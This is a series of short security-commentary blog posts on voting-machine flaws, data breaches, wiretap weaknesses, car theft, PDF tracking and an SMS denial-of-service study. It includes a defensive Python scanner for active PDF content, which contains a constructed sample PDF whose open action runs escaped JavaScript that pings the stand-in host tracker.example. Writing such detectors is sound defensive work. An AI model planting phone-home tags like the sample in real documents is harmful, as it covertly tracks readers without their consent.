Security

Diebold’s AccuVote-TS Voting Machine

A few days ago Ed Felten announced he and his students had released a detailed security analysis of the Diebold AccuVote-TS voting machine. The executive summary and/or demonstration video is well worth a look, and the full research paper is a must-read for anyone interested in computer security.

By later that day, the president of Diebold Election Systems had issued a rebuttal. I’m a security dabbler, not an expert, but to my semi-trained eye the rebuttal looks like a bunch of smoke. I’m looking forward to hearing the Princeton authors’ response [Update 9/22: posted here], but while I’m waiting for that here’s my own take on it:

Schneier on terror

Bruce Schneier has a nice piece echoing the idea that the goal of terrorism isn’t to blow up planes and kill people, it’s terror itself.

Air of smugness

What a great quote! From a story about presenters at Black Hat demonstrating a Wi-Fi driver exploit:

The video shows Ellch and Maynor targeting a specific security flaw in the Macbook’s wireless “device driver,” the software that allows the internal wireless card to communicate with the underlying OS X operating system. While those device driver flaws are particular to the Macbook — and presently not publicly disclosed — Maynor said the two have found at least two similar flaws in device drivers for wireless cards either designed for or embedded in machines running the Windows OS. Still, the presenters said they ultimately decided to run the demo against a Mac due to what Maynor called the “Mac user base aura of smugness on security.”

Information wanting to be free

Yet another huge loss of names and Social Security numbers:

The information was prepared by the loan company in January for use by Hummingbird. The data was encrypted and password-protected, but subsequently decrypted and stored on the now-lost hardware by the Hummingbird employee, Texas Guaranteed Student Loan said.

And this, boys and girls, is perhaps the truest meaning of “information wants to be free.” Not Free as in beer, not Free as in speech, but free as in free-flowing water streaming through even the smallest of holes in a dike.

Report documents worst voting-machine security flaw yet…

An inexcusable number of security flaws have been found in Diebold voting machines over the past few years, but a new report from BlackBoxVoting documents what Avi Rubin and Ed Felten at Freedom to Tinker say is the worst one yet:

A report by Harri Hursti, released today at BlackBoxVoting, describes some very serious security flaws in Diebold voting machines. These are easily the most serious voting machine flaws we have seen to date — so serious that Hursti and BlackBoxVoting decided to redact some of the details in the reports…

The attacks described in Hursti’s report would allow anyone who had physical access to a voting machine for a few minutes to install malicious software code on that machine, using simple, widely available tools. The malicious code, once installed, would control all of the functions of the voting machine, including the counting of votes.

Gone in 20 minutes…

From a short article in Left Lane News about how car thieves are using laptops to circumvent keyless-entry locks:

The expert gang suspected of stealing two of David Beckham’s BMW X5 SUVs in the last six months did so by using software programs on a laptop to wirelessly break into the car’s computer, open the doors, and start the engine…

While automakers and locksmiths are supposed to be the only groups that know where and how security information is stored in a car, the information eventually falls into the wrong hands.

This should come as a surprise to no one. What concerns me more is that such software is no doubt available not just to “expert gangs” but also the equivalent of script-kiddies who normally wouldn’t even be able to figure out how to hot-wire a ’69 Buick.

(Thanks to Regis for the link…)

Talk: Matt Blaze on “Signaling Vulnerabilities in Law-Enforcement Wiretap Systems”

For folks local to the Bay Area, Prof. Matt Blaze is speaking next week at Stanford on vulnerabilities in the systems currently being used by law enforcement for wiretapping. The talk is at 4:15PM next Wednesday, 3/8/06 at Stanford University’s HP Auditorium, Gates Computer Science Building B01.

Signaling Vulnerabilities in Law-Enforcement Wiretap Systems
Matt Blaze, University of Pennsylvania

Telephone wiretap and dialed number recording systems are used by law enforcement and national security agencies to collect investigative intelligence and legal evidence. This talk will show how many of these systems are vulnerable to simple, unilateral countermeasures that allow wiretap targets to prevent their call audio from being recorded and/or cause false or inaccurate dialed digits and call activity to be logged. The countermeasures exploit the unprotected in-band signals passed between the telephone network and the collection system and are effective against many of the wiretapping technologies currently used by US law enforcement, including at least some “CALEA” systems. Possible remedies and workarounds will be proposed, and the broader implications of the security properties of these systems will be discussed.

A recent paper, as well as audio examples of several wiretapping countermeasures, can be found at http://www.crypto.com/papers/wiretapping/.

This is joint work with Micah Sherr, Eric Cronin, and Sandy Clark.

(Thanks to Mort for the link!)

PDFs that fink

Here’s a tricky little privacy hole: Adobe PDF Reader 6.0 and later will automatically (and silently) execute JavaScript that’s been embedded in a PDF file, and LWN reports that a company called Remote Approach uses this “feature” to tag a PDF so it’ll phone home to their servers whenever it’s opened. Their customers can then go to a special webpage to track when the PDF was opened and at what IP address.

I’m sure you can think of your own scenarios where this would be a Bad Thing™, but the case that brought it to my attention was from a supposedly-anonymous reviewer of an academic paper who discovered Remote’s website in his firewall logs.

The simple moral of the story is that content formats should not be able to run arbitrary code, but the more general point is one of setting limits and expectations. End-users need to be able to limit what’s run on their own computers, and when the actual limits are broader than what a naive user might expect (such as when their supposedly-static PDF document can actually access the network) it’s extra important for the system to alert the user what’s happening and get permission first.
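One way to check a PDF for this kind of active content before opening it, as an added example that is not from the original post or from Adobe: scan the raw file for the PDF names that introduce scripts and actions (/JavaScript, /JS, /OpenAction, /AA, /Launch, /URI), undo the #xx name escapes that are sometimes used to hide them, and pull out any embedded URLs. The sample PDF and the tracker.example host are constructed for the demonstration.

```python
import re

# PDF names that introduce scripts or document-open actions (a phone-home
# tag like the one described above needs at least one of these).
SUSPICIOUS_NAMES = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
                    "/URI", "/SubmitForm"}

# Constructed sample: a minimal uncompressed PDF whose /OpenAction runs
# JavaScript that fetches a remote URL as soon as the document is opened.
# The action name is written as /J#61vaScript (PDF hex escape for 'a').
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /J#61vaScript /JS (app.launchURL("http://tracker.example/ping?id=42");) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def decode_name(raw: bytes) -> str:
    """Undo PDF name escapes (#xx) so /J#61vaScript compares as /JavaScript."""
    unescaped = re.sub(rb"#([0-9A-Fa-f]{2})",
                       lambda m: bytes([int(m.group(1), 16)]), raw)
    return unescaped.decode("latin-1")


def scan_pdf(data: bytes) -> dict:
    """Report suspicious names, embedded URLs and whether streams are compressed."""
    names = {}
    # A PDF name runs from '/' up to whitespace or a delimiter character.
    for m in re.finditer(rb"/[^\s/\[\]<>(){}%]+", data):
        name = decode_name(m.group(0))
        if name in SUSPICIOUS_NAMES:
            names[name] = names.get(name, 0) + 1
    urls = [u.decode("latin-1")
            for u in re.findall(rb"https?://[^\s\"')>]+", data)]
    # Objects inside Flate-compressed object streams are invisible to a raw
    # scan; flag that so the caller knows to inflate the file first.
    return {"names": names, "urls": urls,
            "compressed": b"/FlateDecode" in data}


def has_active_content(data: bytes) -> bool:
    """True when the raw file carries any script or action markers."""
    return bool(scan_pdf(data)["names"])
```

A clean result from the raw scan only means something when the file is not compressed; for a file with /FlateDecode streams the objects must be inflated before this check is meaningful.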

To their credit, Adobe seems to have heeded the moral: the current version of Acrobat Reader (at least on the Mac) gives a pop-up warning saying the PDF is trying to access a remote URL, and allows you to save your security settings on a site-by-site basis. I don’t know when they added this alert or whether it was in response to problems like those I mentioned, but regardless it’s nice to see the feature.

(Thanks to Dirk for the link.)

Potential DOS attack on cell networks

Researchers at Pennsylvania State University have determined that it’s possible to launch an effective denial of service attack on cellphone networks, either in a localized area or nationwide, by flooding known cellphones in the area with SMS messages (see summary, paper and NYTimes article). The attack relies on using web and Internet-based SMS portals to overwhelm the wireless data-band, which is also used for connecting voice calls. Since only messages that are actually delivered over-the-air contribute to the network congestion, attackers would first need to generate a “hit-list” of known-valid cellphones (for example, by scraping websites for cellphone numbers in a given prefix and then slowly testing those for SMS capability before starting the attack).

One snippet from the paper I found interesting was how different cellphone providers deal with a backup of SMS messages awaiting delivery to a single user (e.g. when the cellphone is turned off): AT&T buffered all 400 test SMS messages, Verizon only kept the last 100 messages sent (FIFO eviction), and Sprint only kept the first 30 (LIFO eviction).